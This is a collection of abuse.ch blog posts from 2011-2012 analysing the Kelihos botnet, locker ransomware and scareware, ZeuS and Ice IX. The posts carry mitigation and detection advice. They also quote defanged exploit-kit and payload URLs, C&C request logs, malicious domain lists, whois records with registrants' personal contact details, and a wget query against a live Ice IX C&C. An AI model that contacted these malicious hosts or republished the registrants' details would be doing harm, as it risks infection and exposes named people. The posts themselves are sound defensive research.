Detection ratio: 1 / 46 (detected by Malwarebytes exclusively at the time of this post)
Reference: Virustotal

So what can a network administrator do to mitigate this threat?

Since Kelihos is using port 80 (usually used by the HTTP protocol) to communicate with the P2P drones, you should restrict outbound connections to port 80 TCP and implement a web proxy with protocol inspection capabilities (so that non-HTTP and non-HTTPs traffic that tries to go through the proxy gets blocked, and alerted on)
Patch Windows (run Windows Update) to avoid exploitation through CVE-2010-2568
Use port security on your devices to limit the usage of removable drives and prevent Kelihos from spreading through USB sticks etc
Restrict outbound SMTP connections (port 25 TCP) to prevent Kelihos from sending out spam mails
Restrict access to domain names hosted on dynamic IP addresses and/or whose DNS servers are hosted on dynamic IP addresses by using DNS PRZ

ZeuS- and SpyEye Tracker goes Spamhaus

admin — Tue, 12 Jun 2012 17:24:27 +0000

Today The Spamhaus Project, a well known non-profit organisation fighting cybercrime in the internet, released a new list called “Spamhaus Botnet C&C List” (BGPCC) which is implemented at the router level using the Border Gateway Protocol (BGP). I’m proud to announce that the newly launched list also contains data provided by ZeuS Tracker and SpyEye Tracker.

The list is described on Spamhaus website as follow:

The Spamhaus Botnet Command and Control (C&C) list is an advisory “drop all traffic” list consisting of single IPv4 addresses. The feed does not contain any subnets or CIDR prefixes longer than /32. The servers on these IP addresses host botnet C&C nodes. Botnet C&C nodes are servers that control the individual malware-infected computers (bots) that together form a botnet. Bots regularly contact botnet C&C nodes so that the malware on the bots can transfer stolen data to the C&C node for delivery to the botnet’s owner, and to obtain instructions for what they are to do next. Once a botnet contacts a C&C node, it receives instructions to send spam, host spammed web sites, attack other hosts on the internet, and provide name service (DNS) for the domains used in those attacks.

Reference: http://www.spamhaus.org/bgpf/

As soon as ZeuS- or SpyEye Tracker identifies a new botnet C&C, information will be sent to Spamhaus automatically which will result in a listing on Spamhaus Botnet C&C list within a few minutes. In fact this means that networks using this list are protected from malicious botnet traffic from/to botnet controllers listed on ZeuS- or SpyEye Tracker automatically and without any delay.

By providing Tracker data to Spamhaus, abuse.ch continues its fight against cybercrime and bad actors on the internet.

If you are an ISP or network provider you might want to have a look at the Spamhaus BGP feed.

*** Further reading ***

Ransomware Gets Professional, Targeting Switzerland, Germany And Austria

admin — Sun, 06 May 2012 20:23:05 +0000

In March I blogged about a ransomware which has been targeting various countries, locking down the victims computer due to “Child Porn and Terrorism”.

This week I spotted another ransomware campaign that is targeting Swiss, German, and Austrian internet users. This time the criminals seems to use a different schema to lock down the victims computer: violation of local copyright law.

*** Infection vector ****
The infection vector is a well known drive-by exploit kit called “Blackhole”. It is sold in underground forum and used by various criminal groups to infected computers “on the fly” by (ab)using one or more security vulnerabilities in the victims web browser (or a third party plug-in like Adobe Flash Player, Adobe Reader or Java). In this case a Blackhole exploit kit located at pampa04.com was involved to spread the ransomware:

hXXp://pampa04.com/main.php?page=d73d9795c56f8f33 [landing page]
-> hXXp://pampa04.com/data/ap2.php [JavaScript loading exploits]
–> hXXp://pampa04.com/Edu.jar [Java exploit]
—> hXXp://pampa04.com/w.php?f=5e91c&e=0 [Payload]

If the installed Java version on the victims computer is not up to date (unpatched), the downloaded jar file (Edu.jar) will exploit a well known vulnerability in Java which will trigger the download of the payload (Trojan) and finally execute it to infect the computer. The payload had a detection rate of 4/42 on Virustotal:

Filename: info.exe
MD5: 56f4d5837af32b12069576fae8c2b3c5
File size: 312.5 KB
AV-detection rate: 4/42

*** Analysis of the payload (Ransomware) ***
If the exploitation of the victims computer is successful, the Ransomware will install itself into the Application Data directory of the current user:

C:\Documents and Settings\Christoph\Application Data\itunes_service01.exe

Once the computer has been infected, the Ransomware will try to contact its Command&Control server (C&C) located at joonwalker.com using HTTP GET:

hXXp://joonwalker.com/unser1/redirector/redirector.php
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php
hXXp://joonwalker.com/ajax/libs/jquery/1.3.2/jquery.min.js
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/bg_ch.gif
hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/js/keyboard.js

The landing URL redirector.php will determine the location of the infected computer by using GeoIP and will redirect the request to the matching site by using HTTP 302 Found, for example:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/index.php

While investigating this C&C I’ve found several other URLs which shows that this Ransomware is targeting not only Switzerland but also several other countries:

hXXp://joonwalker.com/unser1/universalbezahlung/schweiz/ (Switzerland)
hXXp://joonwalker.com/unser1/universalbezahlung/deutschland/ (Germany)
hXXp://joonwalker.com/unser1/universalbezahlung/oesterreich/ (Austria)
hXXp://joonwalker.com/unser1/universalbezahlung/england/ (England)
hXXp://joonwalker.com/unser1/universalbezahlung/frankreich/ (France)
hXXp://joonwalker.com/unser1/universalbezahlung/holland/ (Netherlands)


Country: Swiztzerland (SUISA)	Country: Germany (GVU)


Country: Austria (AKM)	Country: United Kingdom (PRS)


Country: France (SACEM)	Country: Netherlands (BUMA-STEMRA)

What lights up quickly when taking a look at these URLs is the fact that they are all written in German. So it looks like the cybercriminal behind this ransomware campaign is a German speaking person. While analysing all these different URLs I noticed that the cybercriminal has spent quite some time to prepare them. The language seems to be well written (I couldn’t find as many write errors as I would have expected). In addition it appears that the cybercriminal tried to get intel about where the victim can buy paysafecard (for the record: the victim has to pay a country specific amount of money to the cybercriminal using paysafecard to get his computer unlocked) and which association is tracking copyright infringement in the specific country. For example, he tells Swiss victims that they can obtain paysafecard on the federal railway station (SBB) and the MediaMark (a German based electronic discounter).

Another interesting finding is the fact that the Ransomware comes with an additional Trojan called Aldi Bot. Aldi Bot steals banking information (similar to ZeuS and SpyEye) and has some additional DDoS functionality.

Fortunately, Aldi Bot C&C traffic is very easy to identify due to the fact that this Trojan uses a specific User-Agent called “Aldi Bot FTW! ”. In this case the Aldi Bot C&C is located at the same server/domain as the Ransomware itself but on a different URI:

GET /unser1/universalpanel/gate.php?hwid=XXX&pc=XXX&localip=XXX&winver=XXX HTTP/1.1
User-Agent: Aldi Bot FTW!
Host: joonwalker.com

*** Command&Control Infrastructure ***

The domain name used by this Ransomware and Aldi Bot is pointing to a Russian web hosting provider called “Amtel Svyaz”:

$ dig +short joonwalker.com
195.208.185.99

$ whois 195.208.185.99
inetnum: 195.208.184.0 – 195.208.187.255
netname: AMTEL-SVYAZ
descr: “Amtel Svyaz” ZAO
country: RU
org: ORG-AZ2-RIPE
admin-c: AG12682-RIPE
tech-c: AG12682-RIPE
tech-c: AG8732-RIPE
status: ASSIGNED PA
mnt-by: ROSNIIROS-MNT
mnt-domains: AMTELSV-MNT
mnt-routes: ROSNIIROS-MNT
source: RIPE # Filtered
[...]

The domain name joonwalker.com is registered through a Russian based domain registrar called Regtime Ltd (also known as webnames.ru):

Domain name: joonwalker.com

Name servers:
ns1.nameself.com
ns2.nameself.com

Registrar: Regtime Ltd.
Creation date: 2012-04-29
Expiration date: 2013-04-29

Registrant:
Huth Matthias
Email: huthmatthias@yahoo.de
Organization: Huth Matthias
Address: Bremenstrasse 12
City: Gladbeck
State: NRW
ZIP: 45964
Country: DE
Phone: +49.3051236167
Fax: +49.3051236169

According to whois the holder of this domain is “Huth Matthias” which has registered various other domain names this year:

arschenpustel.com
arschtrompete.com
arschtrompeteauto.com
arschtrompeteshop.com
bascvj.com
brauchnwanich.com
dergeldmacher.com
deutschecamworld.com
easyonlinebuxxx.com
fettehupenalter.com
fiftypercentworker.com
flobbo-online.com
fressehaltenlol.com
fuehlediebezahlung.com
fuehlediecon.com
geiledeutschecams.com
geileschnittendicketitten.com
geld-machen-mit-ebooks.com
geldverdienen-easy.com
gema-gebuehreneinzug.in
gemagatezor.com
gemagatezor.net
gewinnspiele-king.com
grosqa.com
helexxaione.com
hunnibezahlor.com
hunniconnector.com
ichmussconnecten.com
joonwalker.com
knallrattern.com
kohlhanser.com
konschtantin.com
kuemmeljoe.com
leckerfrischekacke.com
meineguetekak.com
meineherrenlaff.com
mightyporntube.com
mjun1.info
mongoneger.com
moxitoeex.com
moxitom.com
muellgeburten.com
muselfrauen.com
nulpapors.com
odrjaj.com
ratschuikakk.com
ratzeputzel.com
reich-durch-ebooks.com
toilettenspuelung.com
trueffelmueffel.com
tschaijikki.com
tujkea.com
universalpan1.com
universalpan2.com
urgeprotectar.com
vabrus.com
verdienjegek.com
whatwillhappenbaby.com
wonkeebonkii.com
xakacj.com
zeig-malmo-pse.in
zeig-malmopse.in
zeigmalmoepse.in
zeigmalmopse.in

All these domain names can be considered as malicious and should be blocked on your network edge.
To prevent this kind of infections you should ensure that your operating system as well as all installed applications (especially browser plug-ins) are up to date.

*** Further reading ***

AMaDa Discontinued, Palevo Tracker With A New Home

admin — Sun, 01 Apr 2012 13:50:24 +0000

As announced on Twitter last month, abuse.ch Malware Database (AMaDa) has been discontinued on 2012-03-17.

Since my announcement on Twitter to discontinue AMaDa, I received several dozen emails from IT security representatives of ISPs, national CERTs as well as governmental and non-governmental organisations that were using AMaDa’s blocklist to identify compromised computers within their networks. I have to say that I was quite amazed how many people used AMaDa’s blocklist. However I’m unable to answer all these emails due to lack of time, hence I decided to publish a short statement on my blog.

AMaDa was launched in 2010, since then it has analysed 169’545 URLs serving malware, 160’183 malicious binaries and identified 1’685 malware botnet controllers associated with all kinds of Trojans (like Mebroot, TLD/TDSS, Carberp, BlackEnergy, Ramnit and many more).

In February 2011, I started Palevo Tracker as sub-project of AMaDa. Palevo Tracker’s blocklist was served together with the AMaDa IP and Domain blocklist.

Running and maintaining the tracking infrastructure (ZeuS-, SpyEye- and Palevo Tracker) is very time intensive, also since it created much “background noise” (sometimes I think I need a secretary to handle all emails and requests). Hence I was prevented from blogging as much as I would have liked to last year. Unfortunately, every day only has 24 hours, and due to personal circumstances as well as my focus on other (non-public) projects I’m no longer able to provide AMaDa’s data / information with a good enough quality. I always serve data and information on “best effort” basis, and as I’m no longer able commit to that for AMaDa I’ve decided to discontinue the project (please keep in mind that all these projects are done in my spare time).

I’m aware that this is bad news for many of you, but fortunately I also have some good news. This weekend I moved Palevo Tracker onto a new infrastructure. I decided to keep Palevo Tracker running as a “new” project. Since AMaDa is gone, Palevo Tracker has found a new home on it’s own sub domain:

Palevo Tracker (including it’s blocklists) can be found at https://palevotracker.abuse.ch

If you are using one of AMaDa’s blocklists, please ensure that you stop query them as they are no longer available. If you want to keep up identifying Palevo botnet C&Cs please switch to one of the blocklists available on Palevo Tracker’s Blocklist page.

*** Links ***

Kelihos Back In Town Using Fast Flux

admin — Sun, 04 Mar 2012 17:00:14 +0000

In September 2011, Microsoft announced the takedown of the Kelihos botnet. In the beginning of 2012, Kaspersky found a new version of Kelihos in the wild.

Kelihos (also know as Hlux) is a Spambot with the capability to steal credentials from the victims computer and drop additional malware. While the old version used the second level domain cz.cc for it’s distribution and to control the botnet, the new version takes advantage of TLD .eu in combination with Fast Flux techniques.

*** The Kelihos Spambot ***

Recently, I spotted a sample of Kelihos in my sandnet, so I decided to have a short look at it:

As soon the victims computer has been infected successfully, the malware will try to drop an additional file by calling a .eu domain which seem to be hard coded in the infection binary:

hXXp://ejywqem.eu/rtce003.exe
hXXp://etrodhy.eu/jucheck.exe

The first URL will return a binary:

Filename: rtce003.exe
MD5 hash: 1393e4f5d0691e3de07eeda1b1451b89
File size: 886’272 bytes
AV detection: 10 / 43

The mentioned file will install the WinPcap library, which is being used by the malware to sniff the network traffic on the victims computer:

Origin process (executing process)	Affected file
C:\WINDOWS\Temp\_ex-68.exe	C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\Temp\_ex-68.exe	C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\Temp\_ex-68.exe	C:\WINDOWS\system32\drivers\npf.sys

By sniffing the network traffic, the malware is able to steal sensitive data like credentials.
The second URL (jucheck.exe) will just return a HTTP 200 OK. As soon as the WinPcap library has been installed, the malware will start to communicate with other drones on port 80 (using it’s own protocol). It’s some kind of P2P protocol used by the malware to get a list of other drones participating in the Kelihos botnet.

To begin it’s spam operations, Kelihos will connect to another drone using HTTP and a random URL string:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre

*encrypted-data*

HTTP/1.1 200
Server: Apache
Content-Length: 55002
Content-Type:
Last-Modified: X
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 04 Mar 2012 X
Last-Modified:Sun, 04 Mar 2012 X
Accept-Ranges:bytes

*encrypted-data*

This communication is being used to get the spam templates as well as the email address list. Afterwards the spambot will start to send out spam mails (click to enlarge):

Currently the Kelihos botnet seems to send out German stock spam.

*** Kelihos FastFlux botnet ***

Let’s take a closer look at the .eu domains used by Kelihos. What pops up quickly is the fact that the domain names used by Kelihos are hosted on a FastFlux botnet, as all the records has a TTL of 0:

$ dig ejywqem.eu A

;; QUESTION SECTION:
;ejywqem.eu. IN A

;; ANSWER SECTION:
ejywqem.eu. 0 IN A 88.132.1.15

The delegated nameservers for the mentioned domain name are hosted on a FastFlux botnet as well. This is what we call Double-Flux:

$ dig ejywqem.eu NS

;; QUESTION SECTION:
;ejywqem.eu. IN NS

;; ANSWER SECTION:
ejywqem.eu. 0 IN NS ns6.ejywqem.eu.
ejywqem.eu. 0 IN NS ns1.ejywqem.eu.
ejywqem.eu. 0 IN NS ns2.ejywqem.eu.
ejywqem.eu. 0 IN NS ns3.ejywqem.eu.
ejywqem.eu. 0 IN NS ns4.ejywqem.eu.
ejywqem.eu. 0 IN NS ns5.ejywqem.eu.

When taking a look at the geo location of this Fast Flux botnet, it seems that the botnet is mainly located in eastern Europe:

Due to the fact that these domain names are using double-flux, it is extremely hard to shut them down (there is no webserver or DNS server to take down). Currently, there are several domain names hosted on this Fast Flux botnet:

awmybak.eu
beqylhe.eu
bozopit.eu
dilecdo.eu
edkadaf.eu
ejywqem.eu
essessa.eu
etrodhy.eu
gipahco.eu
gycakus.eu
hiahnuh.eu
iqqeniv.eu
jerufuw.eu
juzagyt.eu
kareffu.eu
kufogku.eu
monedyg.eu
opgukem.eu
oxkyrir.eu
piqxoxo.eu
qofabar.eu
rivinax.eu
rybunwa.eu
seybdec.eu
suiqtat.eu
udqejyx.eu
ugdycom.eu
usmuzeq.eu
wabomiw.eu
wyylsic.eu
xulotgu.eu
ykqewyx.eu
yraxvuh.eu
zaetpop.eu
zitufon.eu
zobubof.eu
zoneczu.eu

All mentioned domain names are registered through OnlineNIC (a domain name registrar located in the US):

Domain: zoneczu

Registrant:
NOT DISCLOSED!
Visit www.eurid.eu for webbased whois.

Registrar Technical Contacts:
Name: Breeze Wu
Organisation: OnlineNIC Inc.
Language: en
Phone: +86.15306099988
Fax: +852.58044444
Email: Tech@regionalofficecenter.com

Registrar:
Name: OnlineNIC Inc
Website: www.onlinenic.com

Name servers:
ns5.pizzebu.com
ns6.pizzebu.com

The domain name used to resolve these malicious domains is registered through internet.bs (a domain name registrar located in the Bahamas):

Domain Name: PIZZEBU.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.PIZZEBU.COM
Name Server: NS2.PIZZEBU.COM
Name Server: NS3.PIZZEBU.COM
Name Server: NS4.PIZZEBU.COM
Name Server: NS5.PIZZEBU.COM
Name Server: NS6.PIZZEBU.COM
Status: clientTransferProhibited
Updated Date: 13-jan-2012
Creation Date: 13-jan-2012
Expiration Date: 13-jan-2013

This Fast Flux botnet reminds me of the Fast Flux botnet used by Waledac which was also using a TTL of 0 for their DNS records.

*** Detection ***

As hard as it is to take down this botnet, as easy it should be to detect computers infected with Kelihos. The malware itself seems to ignore several RFCs which makes it very easy to detect infected computers in corporate and governmental networks.

In the first stage, the malware hits “jucheck.exe” with an incomplete HTTP request:

GET /jucheck.exe HTTP/1.0
Host: etrodhy.eu

This particular HTTP request is missing several HTTP fields which a normal web browser would use:

Several HTTP fields like User-Agent, Accept-Language, Accept-Encoding are missing
The URL jucheck.exe seems to be quite static, so you just have to watch out for .eu domains in combination of jucheck.exe in your gateway logs

In the second stage (where the malware tries to connect to other drones using HTTP), the malware sends 1-2KB of encrypted data to the foreign peer:

GET /FCgbKbGODaYkpTghnsw.htm HTTP/1.1
Host: 79.132.177.87
Content-Length: 1464

I’m not a RFC specialist, but I’ve never seen a HTTP GET request in combination with the Content-Length header. I would only expect the HTTP Content-Length header from the server (response) or when sending a HTTP POST request to the server. Therefore it should be very easy to detect Kelihos in your network, just watch out for HTTP GET request containing the header field “Content-Length”.

Happy Kelihos hunting!

*** Further reading ***

*** Further reading (for the Kelihos botnet masters) ***

Follow me on Twitter:
https://twitter.com/abuse_ch

Scareware Locks Down Computer Due To Child Porn and Terrorism

admin — Fri, 02 Mar 2012 18:20:59 +0000

Recently, my sandbox came across a scareware that locks down the victim’s computer due to “terrorism and child pornography”. The malware is being detected by some AV vendors as “Win32/LockScreen”.

The schema is pretty simple: The criminals try to infect computers with scareware (eg. through Drive-By exploits). As soon as the computer is infected, the malware locks down the machine so that the user won’t be able to log in any more. The malware then displays a message to the user that the law enforcement agency XY found child pornography on the victims computer and that the his computer was used to send out “spam mails with terrorist motives”:

Attention!!!

This operating system is locked due to the violation of the laws of the United Kingdom! Following violations were detected:
Your IP address was used to visit websites containing pornography, child pornography, zoopillia and child abuse. Your computer also contains video files with Pornographic content, elements of violence and child pornograhpy! Spam-messages with terrorist motives were also sent from your computer

This computer lock is aimed to stop your illegal activity.

The message which is being displayed to the victim looks like this (click to enlarge):

What is interesting with this scareware is the dependency of the geo location of the victim’s computer. Before the scareware displays the message shown above, it contacts a central botnet command and control server (C&C) located in Ukraine (188.190.99.174 – AS197145 Infium LTD) using HTTP:

X-188.190.099.174.00080: GET /loc/gate.php?getpic=getpic HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

188.190.099.174.00080-X: HTTP/1.1 200 OK
Date: Wed, XX Feb 2012 XX:XX:XX
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

http://188.190.99.174/pic/DE.bmp

In the first request the malware contacts the C&C using a parameter called “getpic”. The C&C will response with an URL containing the location of the image the malware should display to on the victim. The malware will follow the URL and download the BMP-file:

GET /pic/DE.bmp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Cache-Control: no-cache

Then the malware will determine the IP address of the victim’s computer by using the parameter “getip”:

X-188.190.099.174.00080: GET /loc/gate.php?getip=getip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSlE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 188.190.99.174
Connection: Keep-Alive

Afterwards the malware displays a “lock screen” to the user using the response (=ip address) from the C&C and the image file downloaded before.

The interesting part is that you can identify the countries which are being hit by this attack by guessing the files on the botnet controller (country codes). So far, I’ve identified the following countries/URLs:


Location: http://188.190.99.174/pic/AT.bmp Country: Austria (AT) Agency: BUNDESPOLIZEI Domain name: landes-kriminalt.net	Location: http://188.190.99.174/pic/DE.bmp Country: Germany (DE) Agency: BUNDESPOLIZEI Domain name: landes-kriminalt.net


Location: http://188.190.99.174/pic/GB.bmp Country: United Kingdom (GB) Agency: METRPOPOLITIAN POLICE Domain name: policemetropolitan.org	Location: http://188.190.99.174/pic/FR.bmp Country: France (FR) Agency: Gendarmerie nationale Domain name: n-p-f.org


Location: http://188.190.99.174/pic/IT.bmp Country: Itanly (IT) Agency: Guardia di Finanza Domain name: it-polizia.org	Location: http://188.190.99.174/pic/ES.bmp Country: Spain (ES) Agency: La policia ESPANOLA Domain name: lapoliciaespanola.org

Most domain names mentioned above are misspelled, for example, the domain name landes-kriminalt.net is a misspelling of “Kriminalamt” which is equivalent to the Federal Police. All mentioned domain names are registered through registrar BIZCN (a registrar located in China):

Domain Name: LANDES-KRIMINALT.NET
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS3.CNMSN.COM
Name Server: NS4.CNMSN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 02-may-2011
Creation Date: 02-may-2011
Expiration Date: 02-may-2012

Last update of whois database: Thu, 01 Mar 2012 10:26:21 UTC
[...]

Domain name: landes-kriminalt.net

Registrant Contact:
Lilo
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Administrative Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Technical Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

Billing Contact:
Petr Rublev goldenbaks@gmail.com
+7926987453 fax: +7926987453
privincealnaya 23
Tomsk Tomsk 78945
cn

DNS:
ns3.cnmsn.com
ns4.cnmsn.com

Created: 2011-05-02
Expires: 2012-05-02

What nearly all domain names have in common is the fact that they have already been up since more than 8 months (Created: 2011-05-02). The same registrant has also registered other domain names:

landes-kriminalt.net
landes-kriminalt.org
bundeskriminalamtes.org
n-p-f.org
policemetropolitan.org
lapoliciaespanola.org
it-polizia.org
myxxxhot.org
nanosearchpro.net
porno-pir.org
privatetechnology.biz
sexysheep.org
tourboportal.com
tubechube.org

I’m asking myself how the criminals have managed not to get their domain names suspended for such a long time period. Please note that these domain names can be considered as malicious and should therefore be blocked at your network’s edge (web gateway / proxy / DNS) along with the botnet controller (188.190.99.174).

The described Scareware schema isn’t really new, Switzerland along with several other European countries were hit by a similar attack back in 2011:

Cybercriminals Moving Over To TLD .su

admin — Sun, 29 Jan 2012 12:46:09 +0000

During the past few years the Top Level Domain (TLD) .ru has been heavily abused by cybercriminals. According to ZeuS Tracker, TLD .ru was one of the most abused Top Level Domains that were used by criminals to run ZeuS botnet controllers.

The Top Level Domain .ru is managed by the Coordination Center for TLD RU (cctld.ru). CCTLD.ru finally did their job well and addressed the reputation problem TLD.ru had by setting up new terms and conditions for domain name registration of .ru domains which came into force on November 11 2011.

One of the most interesting parts of the new terms and conditions is the following passage:

5.7. The Registrar may terminate the domain name delegation upon the receipt of a substantiated petition from an organization indicated by the Coordinator as a competent one to determine violations in the Internet, should the petition contain information about the domain’s information addressing system being used for:

receipt from third parties (users of the system) of confidential information by misleading these persons regarding its origin (authenticity) due to similarity of the domain names, design or content of the information (phishing);
unauthorized access to third parties’(users, visitors) information systems or for infecting these systems with malware or taking control of such software (botnet control);

[...]

In fact this means that a registrar can terminate a domain name when it is being used for phising attacks or when it is being used to control a botnet. However, there is one part which seems to be not well defined:

[...] receipt of a substantiated petition from an organization indicated by the Coordinator as a competent one to determine violations in the Internet”

I’m asking myself what the definition of “organization indicated by the Coordinator as a competent one to determine violations in the Internet” might be. As we all know there are many security vendors and non-profit organisations out there which do a great job in tracking down malicious and fraudulent content. Will registrars accept takedown requests received from such parties? I don’t know…

However, what I can say so far is that the number of fraudulent .ru domains used by ZeuS botnet herders decreased in the beginning of 2012. I can also see that malicious .ru domains which are being added to ZeuS Tracker have a much shorter life span. While malicious .ru domains used to stay active for several weeks or months in the past, they are now getting nuked much faster (mostly within 4-24hrs). That’s great news for the internet community!

Unfortunately we all know that there is a never ending cat and mouse game between the security industry / infosec community and cybercriminals. Criminals have already noticed that their domains are getting shut down much faster. So they started to look for another TLD to use for their dirty business and found a TLD that nearly has been forgotten: the TLD .su.

For those of you who don’t know: .su is (or should I say was) the Top Level Domain for the Soviet Union, which we all know doesn’t exist any more. Nevertheless, TLD .su (which is operated by RIPN) is still active today which means that people can still register domain names with that TLD. As of today I’m seeing an increasing number of malicious .su domains being used by botnet herders. In fact this means that the criminals seem to be switching from .ru to .su.

Since the Soviet Union isn’t any more and I see legit .su domains pretty rarely, I think it’s a good idea to block .su on the network edge (web proxies / content filtering systems). If you are operating a gateway in your company / network you should take the time and have a look at your logs. If you don’t see any legit .su domains being hit/used in your company just simply block it.

Follow me on Twitter:
https://twitter.com/abuse_ch

ZeuS Gets More Sophisticated Using P2P Techniques

admin — Mon, 10 Oct 2011 09:56:22 +0000

Recently, I’ve seen some major modifications in ZeuS murofet/LICAT.
Murofet (also know as LICAT) is a modified version of ZeuS, which is using a so called Domain Generation Algorithm (DGA) to calculate the current botnet C&C domain.

However, a few weeks ago I’ve noticed that no new murofet/LICAT C&C domain names have been registered by the criminals. I was a little bit confused and decided to analysed a recent ZeuS sample (spread through a Spam campaign targeting US citizens). When I ran the binary in my sandbox, I’ve seen some weird UDP traffic. My first guess was: This is not ZeuS. But after I’ve analysing the infection I came to the conclusion that it is actually ZeuS.

*** A new (custom) version of ZeuS ***

The new version of ZeuS is no longer using a DGA to determine the current C&C domain, therefore it’s also not possible to pre-calculate the C&C domains that will be used in the near future. Obviously, the criminals switched back to a hardcoded C&C domain which is stored in the ZeuS config file.

The *new* version of ZeuS (v3?) implements a Kademlia-like P2P botnet. Similar to the Miner botnet, ZeuS is now using a “IP list” which contains IP addresses of other drones participating in the P2P botnet. An initial list of IP addresses is hardcoded in the ZeuS binary. As soon as a computer gets infected, ZeuS will try to find a active node by sending UDP packets on high ports. If the bot hits an active node, the remote node will response with a list of current IP addresses that are participating in the P2P network. Additionally, the remote node will tell the requesting node which binary- and config version he is running. If the remote node is running a more recent version, the bot will connect to it on a TCP high port to download a binary update and/or the current config file. Afterwards the bot will connect to the C&C domain listed in the config file using HTTP POST.

The HTTP protocol is only being used to drop the stolen data to the Dropzone and/or to receive commands from the botnet master. In fact this means there is no longer a BinaryURL or a ConfigURL that ZeuS Tracker can track. It also makes it quite difficult for security researchers to keep track of the targets. What is interesting is the fact that if everything fails (=no working/active P2P drone can be found and the main C&C is dead) the bot will use the DGA as fallback mechanism.

At first glance these are bad news. But fortunately the new mechanism also has benefits: There is just one ZeuS C&C active at the same time, so every time the domain name gets suspended/terminated, the criminals have to push out a new config file.

*** ZeuS sinkhole data ***

During the past few weeks I was able to sinkhole several ZeuS botnet C&Cs that were associated with this new ZeuS version. The chart below shows up the number of unique IP addresses that are associated with this ZeuS version and hitting my sinkhole. The highest IP count was about 100k unique IPs in 24hrs.

The Geo location of this ZeuS botnet looks like this:

As we can see on the chart above, India seems to have the most infected systems, followed by Italy, the United Staates and Greece. Please consider that this chart just shows the unique IPs for each country. It does not count the unique bot IDs.

As usual, the sinkhole data is being sent to Shadowserver. If you are a network provider / ISP please make sure that you subscribe Shadowservers drone feed to receive reports regarding infected drones in your network/AS (the service is free of charge).

*** Conclusion ***
What I can say so far is that the encryption of this new (custom) version of ZeuS haven’t changed. You should watch out for the following strings in your web proxy logs, which are being used as dropzone for this ZeuS version (using HTTP POST):

/gameover.php
/gameover2.php
/gameover3.php

Since I’ve started to track this ZeuS campaign, I’ve collected more than 270 unique config files.

Since the source code of ZeuS got leaked back in the beginning of 2011, several so called custom builds popped up in the underground which are based on the leaked source code. A good example is a recently on opensc.ws introduced bot kit called Ice IX.

So are we talking about a *new* ZeuS version which we will see being sold in the underground soon? I don’t think so. This seems to be just another custom build. But there is one thing that makes this custom build unique: This build (and the previous murofet/LICAT version) is much more sophisticated than all other ZeuS builds I’ve seen before. Also, when I take a look at the way they operate it looks like this botnet has several customers using the same botnet infrastructure.

Since the guy who wrote this version of ZeuS seems to have a lot of knowledge, it could be that Slavik (the author of the original ZeuS version) has his hands on this ZeuS build. We all know how successful ZeuS was (and still is). So why should Slavik leave this business? I believe that Slavik was unwell with the fact that his trojan was in the spotlight of security researchers, security industry and LEA. Also, ZeuS has attracted a lot of script kiddies and smaller criminal groups which weren’t able to pay that much of money for a product. Slavik probably dropped this business and released the source code for public to get out of this situation. But I believe that he is still developing on ZeuS, but only custom build(s) for a small circle of customers who are able to pay a lot more money that small fishes. This wouldn’t attract that much attention from LEA an security folks, but will bring in a lot more money than dealing with standard customers.

We all know that the fight between criminals and security researchers is a cat and mouse game. I’m sure this wasn’t the last change made to ZeuS and we will continue to see efforts from criminals to make their malware stay more under the radar.

Follow me on Twitter:
twitter.com/abuse_ch

Ice IX – Or Just ZeuS?

admin — Thu, 25 Aug 2011 12:59:44 +0000

This morning I read an interesting article on Securelist regarding a new Trojan called Ice IX that seems to be based on the leaked ZeuS source code.

I’ve googled a little bit and found a post on a well known underground forum where a user with the nickname nvidiag is selling Ice IX (UPDATE Aug 27, 2011: After my blog post the topic on opensc.ws has obviously been deleted):

Ice IX is a new bot form-grabber similar to Zeus , but a big rival to it. It is based on modified Zeus 2 core.
The core was redesigned and enhanced. It was enhanced bypassing the proactive protection and firewall using driver mode, injects are working more stable on IE and Firefox based browsers.
The main goals were adding protection from detection by trackers, getting higher response, more stealthiness, and longer vitality. The goals were successfully reached.

The features advertised by nvidiag seems to be the same as in ZeuS. But there seems to be one new feature:

Protection from Trackers.
The config file now id getting not directly but throw the proxy.php file where you should enter the same key using for crypt data exchange between bot and control panel. If the request for config is created not by bot with the same key the 404 error will be returned. So no way to download and analyze the configuration file.
This is a major advantage if you are creating a big botnets, because the main problem of original Zeus – it is trackers.

So, according to this forum post Ice IX has a function to protect ZeuS Tracker & Co from being able to download the config file. For example, instead of HTTP GET Ice IX will only serve a config file when the clients sends a HTTP POST request

Does this new anti ZeuS Tracker feature makes it impossible to track Ice IX? Well, let’s try this:

$ wget -S –post-data=”id=REDACTED&hash=REDACTED” “chilloutcaffee.net/photos/zb1/cc/ccc.php”
–2011-08-25 XX:XX:XX– http://chilloutcaffee.net/photos/zb1/cc/ccc.php
Resolving chilloutcaffee.net… 123.30.129.251
